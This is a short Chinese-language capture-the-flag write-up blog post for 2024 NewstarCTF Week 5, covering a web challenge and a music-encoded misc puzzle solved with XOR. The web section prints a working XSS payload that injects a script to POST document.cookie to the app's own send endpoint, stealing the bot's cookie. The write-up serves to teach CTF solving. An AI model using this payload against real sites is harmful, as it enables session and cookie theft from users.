Rina's

CTF | 2024 NewstarCTF Week5 WP

Web

PangBai 过家家 (5)

容易知道是 XSS 攻击，容器不能出网所以考虑 SSRF：

<img src=x onerror=s=createElement('script');s.innerHTML="fetch('http://localhost:3000/api/send',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({title:'vde',content:document.cookie})});";body.appendChild(s);

Misc

PlzLoveMe

根据经验可以知道曲子是 Mili – world.execute(me)，根据对应编码读取图片上文字为：

fhwdLd
mnwdOnV
mnwdOnV

蒙出来 XOR 1 后得到

GiveMeLovenoWLovenoW

P.S. XOR 1 这个操作藏在固件里，可是我没找到（bushi。

20 10 月, 2024

Rina

CTF | 2024 NewstarCTF Week5 WP

Web

PangBai 过家家 (5)

Misc

PlzLoveMe

发表回复 取消回复

发表回复取消回复